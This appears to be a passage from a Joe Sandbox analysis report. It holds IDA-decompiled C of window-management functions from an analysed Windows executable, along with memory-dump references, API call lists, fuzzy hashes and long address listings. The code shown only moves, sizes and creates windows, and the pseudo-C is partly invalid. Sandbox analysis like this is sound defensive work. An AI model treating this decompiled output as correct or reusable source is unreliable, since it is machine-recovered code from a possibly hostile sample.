                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileHeap$AllocateCloseCreateFreeHandleRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 873069550-0
                                                                                                                                                              • Opcode ID: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                                                                                                                                              • Instruction ID: 2c35df999285d4324d5b8a2bb6c6846afef495587d3451632d7a4ed779350fa2
                                                                                                                                                              • Opcode Fuzzy Hash: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                                                                                                                                              • Instruction Fuzzy Hash: 55418B326403920BD3149F74ECDAB773760EB46301F09823AFB52A62D2D67DD514DB18
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                              			E0040523F(struct HWND__* _a4, intOrPtr _a8, signed int _a12, unsigned int _a16) {
                                                                                                                                                              				struct HINSTANCE__* _v8;
                                                                                                                                                              				void _v12;
                                                                                                                                                              				struct tagPOINT _v20;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				void* _t111;
                                                                                                                                                              				void* _t112;
                                                                                                                                                              				int _t115;
                                                                                                                                                              				void* _t122;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t126;
                                                                                                                                                              				int _t129;
                                                                                                                                                              				void* _t130;
                                                                                                                                                              				int _t134;
                                                                                                                                                              				unsigned int _t141;
                                                                                                                                                              				int _t175;
                                                                                                                                                              				void* _t181;
                                                                                                                                                              				int _t182;
                                                                                                                                                              				int _t190;
                                                                                                                                                              				int* _t196;
                                                                                                                                                              				void* _t199;
                                                                                                                                                              				signed int _t201;
                                                                                                                                                              
                                                                                                                                                              				_t196 = E0040642D( *0x40b3ac);
                                                                                                                                                              				_v8 = 0xd0d0d0d1;
                                                                                                                                                              				if( *_t196 != 0) {
                                                                                                                                                              					_t104 = _a8;
                                                                                                                                                              					if(_t104 != 0x200) {
                                                                                                                                                              						if(_t104 != 0x100) {
                                                                                                                                                              							if(_t104 == 0x202) {
                                                                                                                                                              								L60:
                                                                                                                                                              								ReleaseCapture();
                                                                                                                                                              								L65:
                                                                                                                                                              								_v8 = 0;
                                                                                                                                                              								L66:
                                                                                                                                                              								return _v8;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t104 != 0x215) {
                                                                                                                                                              								goto L66;
                                                                                                                                                              							}
                                                                                                                                                              							PostMessageA(_a4, 0x232, 0, 0);
                                                                                                                                                              							 *_t196 = 0;
                                                                                                                                                              							if(_t196[1] != 0) {
                                                                                                                                                              								SetCursorPos(_t196[2], _t196[3]);
                                                                                                                                                              							}
                                                                                                                                                              							goto L65;
                                                                                                                                                              						}
                                                                                                                                                              						_t110 = _a12 - 0xd;
                                                                                                                                                              						if(_t110 == 0) {
                                                                                                                                                              							goto L60;
                                                                                                                                                              						}
                                                                                                                                                              						_t111 = _t110 - 0xe;
                                                                                                                                                              						if(_t111 == 0) {
                                                                                                                                                              							goto L60;
                                                                                                                                                              						}
                                                                                                                                                              						_t199 = 0xa;
                                                                                                                                                              						_t112 = _t111 - _t199;
                                                                                                                                                              						if(_t112 == 0) {
                                                                                                                                                              							GetCursorPos( &_v20);
                                                                                                                                                              							_t115 = _t196[0xc];
                                                                                                                                                              							if(_t115 != 0) {
                                                                                                                                                              								if(_t115 != 3) {
                                                                                                                                                              									if(_t115 != 6) {
                                                                                                                                                              										_v20.x = _v20.x - _t199;
                                                                                                                                                              										L58:
                                                                                                                                                              										E004051F1(_t196, _a4, _v20.x, _v20.y);
                                                                                                                                                              										L59:
                                                                                                                                                              										goto L66;
                                                                                                                                                              									}
                                                                                                                                                              									_push(_t196[7]);
                                                                                                                                                              									L32:
                                                                                                                                                              									_push(_t196[4].left);
                                                                                                                                                              									_t196[0xc] = 7;
                                                                                                                                                              									L33:
                                                                                                                                                              									_push(0x7f83);
                                                                                                                                                              									L34:
                                                                                                                                                              									E00405093();
                                                                                                                                                              									goto L59;
                                                                                                                                                              								}
                                                                                                                                                              								_t122 = 2;
                                                                                                                                                              								L49:
                                                                                                                                                              								_push(_t196[5] + _t122);
                                                                                                                                                              								_t196[0xc] = 4;
                                                                                                                                                              								_t181 = _t196[4].left + _t122;
                                                                                                                                                              								L29:
                                                                                                                                                              								_push(_t181);
                                                                                                                                                              								_push(0x7f82);
                                                                                                                                                              								goto L34;
                                                                                                                                                              							}
                                                                                                                                                              							_t196[0xc] = 1;
                                                                                                                                                              							_push(_v20.y);
                                                                                                                                                              							_push(_t196[4]);
                                                                                                                                                              							L38:
                                                                                                                                                              							_push(0x7f84);
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						_t123 = _t112 - 1;
                                                                                                                                                              						if(_t123 == 0) {
                                                                                                                                                              							GetCursorPos( &_v20);
                                                                                                                                                              							_t182 = _t196[0xc];
                                                                                                                                                              							if(_t182 != 0) {
                                                                                                                                                              								_t122 = 2;
                                                                                                                                                              								if(_t182 != _t122) {
                                                                                                                                                              									if(_t182 != 1) {
                                                                                                                                                              										_v20.y = _v20.y - _t199;
                                                                                                                                                              										goto L58;
                                                                                                                                                              									}
                                                                                                                                                              									goto L49;
                                                                                                                                                              								}
                                                                                                                                                              								_push(_t196[5]);
                                                                                                                                                              								_t196[0xc] = 5;
                                                                                                                                                              								_push(_t196[6] - _t122);
                                                                                                                                                              								goto L33;
                                                                                                                                                              							}
                                                                                                                                                              							_push(_t196[5]);
                                                                                                                                                              							_t196[0xc] = 3;
                                                                                                                                                              							L26:
                                                                                                                                                              							_push(_v20.x);
                                                                                                                                                              							_push(0x7f85);
                                                                                                                                                              							goto L34;
                                                                                                                                                              						}
                                                                                                                                                              						_t126 = _t123 - 1;
                                                                                                                                                              						if(_t126 == 0) {
                                                                                                                                                              							GetCursorPos( &_v20);
                                                                                                                                                              							_t129 = _t196[0xc];
                                                                                                                                                              							if(_t129 != 0) {
                                                                                                                                                              								if(_t129 != 3) {
                                                                                                                                                              									if(_t129 != 6) {
                                                                                                                                                              										_v20.x = _v20.x + _t199;
                                                                                                                                                              										goto L58;
                                                                                                                                                              									}
                                                                                                                                                              									_t130 = 2;
                                                                                                                                                              									L28:
                                                                                                                                                              									_push(_t196[7] - _t130);
                                                                                                                                                              									_t196[0xc] = 8;
                                                                                                                                                              									_t181 = _t196[6] - _t130;
                                                                                                                                                              									goto L29;
                                                                                                                                                              								}
                                                                                                                                                              								_push(_t196[5]);
                                                                                                                                                              								_t196[0xc] = 5;
                                                                                                                                                              								_push(_t196[6]);
                                                                                                                                                              								goto L33;
                                                                                                                                                              							}
                                                                                                                                                              							_t134 = 2;
                                                                                                                                                              							_t196[0xc] = _t134;
                                                                                                                                                              							_push(_v20.y);
                                                                                                                                                              							_push(_t196[6] - _t134);
                                                                                                                                                              							goto L38;
                                                                                                                                                              						}
                                                                                                                                                              						if(_t126 != 1) {
                                                                                                                                                              							goto L66;
                                                                                                                                                              						}
                                                                                                                                                              						GetCursorPos( &_v20);
                                                                                                                                                              						_t190 = _t196[0xc];
                                                                                                                                                              						if(_t190 != 0) {
                                                                                                                                                              							_t130 = 2;
                                                                                                                                                              							if(_t190 != _t130) {
                                                                                                                                                              								if(_t190 != 1) {
                                                                                                                                                              									_v20.y = _v20.y + _t199;
                                                                                                                                                              									goto L58;
                                                                                                                                                              								}
                                                                                                                                                              								_push(_t196[7] - _t130);
                                                                                                                                                              								goto L32;
                                                                                                                                                              							}
                                                                                                                                                              							goto L28;
                                                                                                                                                              						}
                                                                                                                                                              						_t196[0xc] = 6;
                                                                                                                                                              						_push(_t196[7]);
                                                                                                                                                              						goto L26;
                                                                                                                                                              					}
                                                                                                                                                              					_t141 = _a16;
                                                                                                                                                              					_t196[1] = 0;
                                                                                                                                                              					_v20.y = _t141 >> 0x10;
                                                                                                                                                              					_v20.x = _t141;
                                                                                                                                                              					MapWindowPoints(_a4, 0,  &_v20, 1);
                                                                                                                                                              					E004050C1(_t196, _v20.x, _v20.y);
                                                                                                                                                              					_t46 =  &(_t196[4]); // 0x10
                                                                                                                                                              					SendMessageA(_a4, 0x214, _t196[0xc], _t46);
                                                                                                                                                              					_push(_a4);
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					asm("movsd");
                                                                                                                                                              					E004051A3();
                                                                                                                                                              					goto L65;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a8 != 0x112) {
                                                                                                                                                              					goto L66;
                                                                                                                                                              				}
                                                                                                                                                              				_t201 = _a12;
                                                                                                                                                              				if((_t201 & 0x0000fff0) != 0xf000) {
                                                                                                                                                              					goto L66;
                                                                                                                                                              				}
                                                                                                                                                              				SystemParametersInfoA(0x26, 0,  &_v12, 0);
                                                                                                                                                              				if(_v12 == 0) {
                                                                                                                                                              					goto L66;
                                                                                                                                                              				}
                                                                                                                                                              				_t6 =  &(_t196[4]); // 0x10
                                                                                                                                                              				_t196[0xc] = _t201 & 0x0000000f;
                                                                                                                                                              				 *_t196 = 1;
                                                                                                                                                              				GetWindowRect(_a4, _t6);
                                                                                                                                                              				_t9 =  &(_t196[8]); // 0x20
                                                                                                                                                              				GetWindowRect(_a4, _t9);
                                                                                                                                                              				_t196[0xd] = 0;
                                                                                                                                                              				_t196[0xe] = 0;
                                                                                                                                                              				_t196[0xf] = GetSystemMetrics(0x3d);
                                                                                                                                                              				_t196[0x10] = GetSystemMetrics(0x3e);
                                                                                                                                                              				if((GetWindowLongA(_a4, 0xfffffff0) & 0x00800000) == 0) {
                                                                                                                                                              					if((GetWindowLongA(_a4, 0xffffffec) & 0x00000100) == 0) {
                                                                                                                                                              						_t196[0x11] = 0;
                                                                                                                                                              						_t196[0x12] = 0;
                                                                                                                                                              						goto L10;
                                                                                                                                                              					}
                                                                                                                                                              					_t175 = GetSystemMetrics(0x2d);
                                                                                                                                                              					_push(0x2e);
                                                                                                                                                              					goto L8;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t175 = GetSystemMetrics(5);
                                                                                                                                                              					_push(6);
                                                                                                                                                              					L8:
                                                                                                                                                              					_t196[0x11] = _t175;
                                                                                                                                                              					_t196[0x12] = GetSystemMetrics(??);
                                                                                                                                                              					L10:
                                                                                                                                                              					_t196[0x13] = GetSystemMetrics(0x22);
                                                                                                                                                              					_t196[0x14] = GetSystemMetrics(0x23);
                                                                                                                                                              					_t196[0x15] = GetSystemMetrics(0x3b);
                                                                                                                                                              					_t196[0x16] = GetSystemMetrics(0x3c);
                                                                                                                                                              					_t29 =  &(_t196[0xd]); // 0x34
                                                                                                                                                              					SendMessageA(_a4, 0x24, 0, _t29);
                                                                                                                                                              					if(GetKeyState(1) == 0) {
                                                                                                                                                              						SendMessageA(_a4, 0x201, 1, 0);
                                                                                                                                                              					}
                                                                                                                                                              					SetCapture(_a4);
                                                                                                                                                              					PostMessageA(_a4, 0x231, 0, 0);
                                                                                                                                                              					if(_t196[0xc] != 0) {
                                                                                                                                                              						_t196[1] = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t196[1] = 1;
                                                                                                                                                              						GetCursorPos( &(_t196[2]));
                                                                                                                                                              						SetCursor(LoadImageA(0, 0x7f86, 2, 0, 0, 0x8040));
                                                                                                                                                              					}
                                                                                                                                                              					goto L65;
                                                                                                                                                              				}
                                                                                                                                                              			}

























                                                                                                                                                              0x00405253
                                                                                                                                                              0x00405259
                                                                                                                                                              0x00405260
                                                                                                                                                              0x004053be
                                                                                                                                                              0x004053c6
                                                                                                                                                              0x0040542e
                                                                                                                                                              0x004055ec
                                                                                                                                                              0x004055df
                                                                                                                                                              0x004055df
                                                                                                                                                              0x00405618
                                                                                                                                                              0x00405618
                                                                                                                                                              0x0040561b
                                                                                                                                                              0x00405622
                                                                                                                                                              0x00405622
                                                                                                                                                              0x004055f3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055ff
                                                                                                                                                              0x00405608
                                                                                                                                                              0x0040560a
                                                                                                                                                              0x00405612
                                                                                                                                                              0x00405612
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040560a
                                                                                                                                                              0x00405437
                                                                                                                                                              0x0040543a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405440
                                                                                                                                                              0x00405443
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040544b
                                                                                                                                                              0x0040544c
                                                                                                                                                              0x0040544e
                                                                                                                                                              0x0040558e
                                                                                                                                                              0x00405594
                                                                                                                                                              0x00405599
                                                                                                                                                              0x004055b0
                                                                                                                                                              0x004055ba
                                                                                                                                                              0x004055c7
                                                                                                                                                              0x004055ca
                                                                                                                                                              0x004055d5
                                                                                                                                                              0x004055da
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004055da
                                                                                                                                                              0x004055c1
                                                                                                                                                              0x004054b9
                                                                                                                                                              0x004054b9
                                                                                                                                                              0x004054bc
                                                                                                                                                              0x004054c3
                                                                                                                                                              0x004054c3
                                                                                                                                                              0x004054c8
                                                                                                                                                              0x004054c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054c8
                                                                                                                                                              0x004055b4
                                                                                                                                                              0x0040556e
                                                                                                                                                              0x00405573
                                                                                                                                                              0x00405577
                                                                                                                                                              0x0040557e
                                                                                                                                                              0x004054a6
                                                                                                                                                              0x004054a6
                                                                                                                                                              0x004054a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054a7
                                                                                                                                                              0x0040559b
                                                                                                                                                              0x004055a2
                                                                                                                                                              0x004055a5
                                                                                                                                                              0x004054fa
                                                                                                                                                              0x004054fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054fa
                                                                                                                                                              0x00405454
                                                                                                                                                              0x00405455
                                                                                                                                                              0x00405531
                                                                                                                                                              0x00405537
                                                                                                                                                              0x0040553c
                                                                                                                                                              0x0040554f
                                                                                                                                                              0x00405552
                                                                                                                                                              0x0040556c
                                                                                                                                                              0x00405585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040556c
                                                                                                                                                              0x00405557
                                                                                                                                                              0x0040555c
                                                                                                                                                              0x00405563
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405563
                                                                                                                                                              0x0040553e
                                                                                                                                                              0x00405541
                                                                                                                                                              0x00405483
                                                                                                                                                              0x00405483
                                                                                                                                                              0x00405486
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405486
                                                                                                                                                              0x0040545b
                                                                                                                                                              0x0040545c
                                                                                                                                                              0x004054de
                                                                                                                                                              0x004054e4
                                                                                                                                                              0x004054e9
                                                                                                                                                              0x00405504
                                                                                                                                                              0x0040551b
                                                                                                                                                              0x00405525
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405525
                                                                                                                                                              0x0040551f
                                                                                                                                                              0x00405494
                                                                                                                                                              0x00405499
                                                                                                                                                              0x0040549d
                                                                                                                                                              0x004054a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054a4
                                                                                                                                                              0x00405509
                                                                                                                                                              0x0040550e
                                                                                                                                                              0x00405515
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405515
                                                                                                                                                              0x004054f0
                                                                                                                                                              0x004054f1
                                                                                                                                                              0x004054f4
                                                                                                                                                              0x004054f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054f9
                                                                                                                                                              0x0040545f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405469
                                                                                                                                                              0x0040546f
                                                                                                                                                              0x00405474
                                                                                                                                                              0x0040548f
                                                                                                                                                              0x00405492
                                                                                                                                                              0x004054b1
                                                                                                                                                              0x004054d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054d2
                                                                                                                                                              0x004054b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405492
                                                                                                                                                              0x0040547b
                                                                                                                                                              0x00405482
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405482
                                                                                                                                                              0x004053c8
                                                                                                                                                              0x004053d4
                                                                                                                                                              0x004053d9
                                                                                                                                                              0x004053e4
                                                                                                                                                              0x004053e7
                                                                                                                                                              0x004053f5
                                                                                                                                                              0x004053fb
                                                                                                                                                              0x0040540a
                                                                                                                                                              0x00405415
                                                                                                                                                              0x00405418
                                                                                                                                                              0x00405419
                                                                                                                                                              0x0040541a
                                                                                                                                                              0x0040541b
                                                                                                                                                              0x0040541c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405421
                                                                                                                                                              0x0040526d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405273
                                                                                                                                                              0x00405282
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405290
                                                                                                                                                              0x00405299
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040529f
                                                                                                                                                              0x004052a9
                                                                                                                                                              0x004052b2
                                                                                                                                                              0x004052b8
                                                                                                                                                              0x004052ba
                                                                                                                                                              0x004052c1
                                                                                                                                                              0x004052cb
                                                                                                                                                              0x004052ce
                                                                                                                                                              0x004052d5
                                                                                                                                                              0x004052df
                                                                                                                                                              0x004052ed
                                                                                                                                                              0x00405306
                                                                                                                                                              0x00405318
                                                                                                                                                              0x0040531b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040531b
                                                                                                                                                              0x0040530a
                                                                                                                                                              0x0040530c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004052ef
                                                                                                                                                              0x004052f1
                                                                                                                                                              0x004052f3
                                                                                                                                                              0x0040530e
                                                                                                                                                              0x0040530e
                                                                                                                                                              0x00405313
                                                                                                                                                              0x0040531e
                                                                                                                                                              0x00405324
                                                                                                                                                              0x0040532b
                                                                                                                                                              0x00405332
                                                                                                                                                              0x0040533d
                                                                                                                                                              0x00405340
                                                                                                                                                              0x0040534a
                                                                                                                                                              0x00405357
                                                                                                                                                              0x00405364
                                                                                                                                                              0x00405364
                                                                                                                                                              0x00405369
                                                                                                                                                              0x00405379
                                                                                                                                                              0x00405382
                                                                                                                                                              0x004053b6
                                                                                                                                                              0x00405384
                                                                                                                                                              0x00405384
                                                                                                                                                              0x0040538f
                                                                                                                                                              0x004053ab
                                                                                                                                                              0x004053ab
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405382

                                                                                                                                                              APIs
                                                                                                                                                              • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                                                                                                                                              • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                                                                                                                                              • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                                                                                                                                              • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                                                                                                                                              • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                                                                                                                                              • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                                                                                                                                              • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                                                                                                                                              • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                                                                                                                                              • GetSystemMetrics.USER32(00000022), ref: 00405320
                                                                                                                                                              • GetSystemMetrics.USER32(00000023), ref: 00405327
                                                                                                                                                              • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                                                                                                                                              • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                                                                                                                                              • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                                                                                                                                              • GetKeyState.USER32(00000001), ref: 0040534E
                                                                                                                                                              • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                                                                                                                                              • SetCapture.USER32(?), ref: 00405369
                                                                                                                                                              • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                                                                                                                                              • GetCursorPos.USER32(-00000008), ref: 0040538F
                                                                                                                                                              • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004053AB
                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                                                                                                                                              • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 985555588-0
                                                                                                                                                              • Opcode ID: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
                                                                                                                                                              • Instruction ID: 205061af9d75e53c44399c3ed0056efb24790ccb844f4c24922cd61c836d760d
                                                                                                                                                              • Opcode Fuzzy Hash: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
                                                                                                                                                              • Instruction Fuzzy Hash: 38C1A071A10A0ABFDB10AF60CD88ABB7B75FB04340F50453BF505A66D0D779A8A1CF99
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00404B03(void* __edx, void* __eflags, struct HWND__** _a4, int _a8, signed int _a12, int _a16, int _a20, CHAR* _a24, long _a28, struct HWND__* _a32) {
                                                                                                                                                              				struct tagRECT _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				struct _WNDCLASSA _v64;
                                                                                                                                                              				char _v320;
                                                                                                                                                              				struct HWND__** _t107;
                                                                                                                                                              				struct HINSTANCE__* _t112;
                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                              				intOrPtr _t114;
                                                                                                                                                              				struct HWND__* _t130;
                                                                                                                                                              				struct HWND__* _t136;
                                                                                                                                                              				struct HWND__* _t142;
                                                                                                                                                              				struct HWND__** _t143;
                                                                                                                                                              				struct HWND__* _t146;
                                                                                                                                                              				signed int _t157;
                                                                                                                                                              				int _t158;
                                                                                                                                                              				int _t161;
                                                                                                                                                              				signed int _t165;
                                                                                                                                                              				signed int _t166;
                                                                                                                                                              				long _t167;
                                                                                                                                                              				void* _t175;
                                                                                                                                                              				int _t177;
                                                                                                                                                              				struct HWND__** _t182;
                                                                                                                                                              
                                                                                                                                                              				_t175 = __edx;
                                                                                                                                                              				_v24 = 1;
                                                                                                                                                              				_t107 = E0040662C( *0x40b42c, _a4);
                                                                                                                                                              				_t182 = _t107;
                                                                                                                                                              				if(_a4 != 0xffffffff) {
                                                                                                                                                              					L3:
                                                                                                                                                              					_push(_a4);
                                                                                                                                                              					L4:
                                                                                                                                                              					sprintf( &_v320, "WindowClass_%d");
                                                                                                                                                              					if(_a24 == 0) {
                                                                                                                                                              						_a24 = 0x409000;
                                                                                                                                                              					}
                                                                                                                                                              					memset( &_v64, 0, 0x28);
                                                                                                                                                              					_t112 =  *0x40b0fc; // 0x400000
                                                                                                                                                              					_v64.hInstance = _t112;
                                                                                                                                                              					_t113 =  *0x40b434; // 0x0
                                                                                                                                                              					_v64.hIcon = _t113;
                                                                                                                                                              					_t114 =  *0x40b438; // 0x10003
                                                                                                                                                              					_v64.hCursor = _t114;
                                                                                                                                                              					_v64.lpszClassName =  &_v320;
                                                                                                                                                              					_v64.style = 8;
                                                                                                                                                              					_v64.lpfnWndProc = E00405B1F;
                                                                                                                                                              					_v64.cbWndExtra = 0;
                                                                                                                                                              					_v64.hbrBackground = 0x10;
                                                                                                                                                              					RegisterClassA( &_v64);
                                                                                                                                                              					_t165 = _a28;
                                                                                                                                                              					if((_t165 & 0x00000008) != 0) {
                                                                                                                                                              						_v24 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t166 = _t165 & 0xfffffff7;
                                                                                                                                                              					if((_t166 & 0xeffffffc) == 0) {
                                                                                                                                                              						_t166 = _t166 | 0x00c00000;
                                                                                                                                                              					}
                                                                                                                                                              					if((_t166 & 0x10000000) == 0) {
                                                                                                                                                              						_a28 = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t166 = _t166 & 0xefffffff;
                                                                                                                                                              						_a28 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_v20.right = _a16;
                                                                                                                                                              					_v20.bottom = _a20;
                                                                                                                                                              					_v20.left = 0;
                                                                                                                                                              					_v20.top = 0;
                                                                                                                                                              					AdjustWindowRect( &_v20, _t166 & 0xfffffffc, 0);
                                                                                                                                                              					_t177 = _a8;
                                                                                                                                                              					_a16 = _v20.right - _v20.left;
                                                                                                                                                              					_a20 = _v20.bottom - _v20.top;
                                                                                                                                                              					if(_t177 == 0xffff0001 || _a12 == 0xffff0001) {
                                                                                                                                                              						if((_t166 & 0x00000003) == 0) {
                                                                                                                                                              							_t177 = 0x80000000;
                                                                                                                                                              							_a12 = 0x80000000;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					if((_t166 & 0x00000001) == 0) {
                                                                                                                                                              						if((_t166 & 0x00000002) == 0) {
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              						_t146 = _a32;
                                                                                                                                                              						if(_t146 != 0) {
                                                                                                                                                              							L26:
                                                                                                                                                              							GetWindowRect(_t146,  &_v20);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t177 = (_v20.right - _v20.left - _a16 - _t175 >> 1) + _v20.left;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t157 = (_v20.bottom - _v20.top - _a20 - _t175 >> 1) + _v20.top;
                                                                                                                                                              							_a12 = _t157;
                                                                                                                                                              							if(_t177 < 0) {
                                                                                                                                                              								_t177 = 0;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t157 < 0) {
                                                                                                                                                              								_a12 = _a12 & 0x00000000;
                                                                                                                                                              							}
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              						_t146 = GetActiveWindow();
                                                                                                                                                              						if(_t146 == 0) {
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              						goto L26;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t158 = GetSystemMetrics(0);
                                                                                                                                                              						if(_a16 > _t158) {
                                                                                                                                                              							_a16 = _t158;
                                                                                                                                                              						}
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_t177 = _t158 - _a16 - _t175 >> 1;
                                                                                                                                                              						_t161 = GetSystemMetrics(1);
                                                                                                                                                              						if(_a20 > _t161) {
                                                                                                                                                              							_a20 = _t161;
                                                                                                                                                              						}
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_a12 = _t161 - _a20 - _t175 >> 1;
                                                                                                                                                              						L30:
                                                                                                                                                              						_t167 = _t166 & 0xfffffffc;
                                                                                                                                                              						_t130 = CreateWindowExA(0,  &_v320, _a24, _t167, _t177, _a12, _a16, _a20, _a32, 0,  *0x40b0fc, 0);
                                                                                                                                                              						 *_t182 = _t130;
                                                                                                                                                              						if(_t130 == 0) {
                                                                                                                                                              							UnregisterClassA( &_v320,  *0x40b0fc);
                                                                                                                                                              							E004066BB( *0x40b42c, _a4);
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						SetPropA(_t130, "PB_WindowID",  &(_a4[0]));
                                                                                                                                                              						if(_a28 != 0) {
                                                                                                                                                              							if((_t167 & 0x01000000) == 0) {
                                                                                                                                                              								if((_t167 & 0x20000000) == 0) {
                                                                                                                                                              									_push(1);
                                                                                                                                                              								} else {
                                                                                                                                                              									_push(2);
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_push(3);
                                                                                                                                                              							}
                                                                                                                                                              							ShowWindow( *_t182, ??);
                                                                                                                                                              						}
                                                                                                                                                              						asm("sbb ebx, ebx");
                                                                                                                                                              						_t182[0xb] =  ~( ~(_t167 & 0x21000000));
                                                                                                                                                              						_t182[4] = 2;
                                                                                                                                                              						_t136 = RtlAllocateHeap( *0x40b0f8, 0, 0xc);
                                                                                                                                                              						_t182[1] = _t136;
                                                                                                                                                              						_t136->i = 9;
                                                                                                                                                              						 *((short*)(_t182[1] + 4)) = 0xfa01;
                                                                                                                                                              						 *(_t182[1]) = 3;
                                                                                                                                                              						 *((short*)(_t182[1] + 8)) = 9;
